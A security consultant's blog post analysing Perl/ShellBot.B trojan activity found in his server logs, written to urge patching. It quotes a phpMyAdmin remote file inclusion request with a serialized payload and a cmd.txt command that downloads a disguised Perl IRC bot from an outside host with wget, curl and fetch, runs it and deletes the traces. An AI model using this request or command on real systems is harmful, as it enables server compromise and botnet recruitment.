Perl/ShellBot.B trojan activity

This is probably not amazing news to many of you, since you probably see a lot of automated scanning and exploitation attempts on your network perimeter. Although a bit of old news by now, I thought I'd share anyway. About a week or two prior to ISC Diary posting about this active threat, I had seen activity related to this Trojan on one of the systems that I have. The following is one of the many similar entries in my access.log:

85.17.234.16 - [18/Sep/2013:02:59:55 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 477 "-" "ZmEu"

This is obviously an automated scanner, which you've probably seen or continue to see on a daily basis. I didn't think much of it, but then I came across the following url-decoded entry:

POST /phpMyAdmin/scripts/setup.php HTTP/1.1
Host: x.x.x.x
Content-type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Opera
Content-Length: 207

action=lay_navigation&eoltype=unix&token=&configuration=a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:38:"ftp[:]//web[:][email protected]/cmd[.]txt";}}

This is a known remote file inclusion attempt against phpMyAdmin, which you can read more about here. I was able to get a hold of two Perl scripts and the cmd.txt file for my analysis. Essentially, the two Perl scripts were what appeared to be a variant of the Perl/ShellBot.A Trojan. It's basically an IRC-based Trojan that allows an attacker to control the compromised servers through. It has capabilities the following capabilities:

  • UDP flooding
  • Nmap/basic port scanning
  • File transferring through DCC
  • Shell access

Here's what I found in the cmd.txt file:

system("cd /tmp;wget ftp[:]//web[:][email protected]/f.pdf;curl -O ftp[:]//web[:][email protected]/f.pdf;fetch ftp[:]//web[:][email protected]/f.pdf;perl f.pdf;perl f.pdf; rm -rf f.pdf*;rm -f /tmp/*pdf*");

If the above is successfully injected (it won't right? because you update your applications right?), it will download the f.pdf file, which is actually a Perl script that contains the ShellBot. I received two copies, f.pdf and p.pdf, targeting phpMyAdmin, and Plesk respectively. The following is a small snippet of the Perl script. Note, the only difference is the channel that the infected hosts join (@canais = channel in Portuguese) #pma and #plesk.

However, earlier last week, ISC Diary posted about a different variant of the ShellBot.B Trojan. According to them, it appears that it is targeting older Plesk vulnerabilities. You can read more about the details on their blog post here. Fortunately, I was able to snag a copy of that Perl script before the hosting server went offline. Much of it appears to be very similar to the previous versions that I talked about above. However, there are notable differences. Here's a sample snippet of that script:

Obviously, the biggest takeaway from all of this is that you need to make sure that you're keeping your applications and servers patched. You will always get bombarded with scans and exploit attempts by automated scanners and malware. That's all I have, just thought I'd share! Stay safe out there.

Author

James Espinosa

Security consultant focused on investigating computer crimes and security breaches for organizations around the world.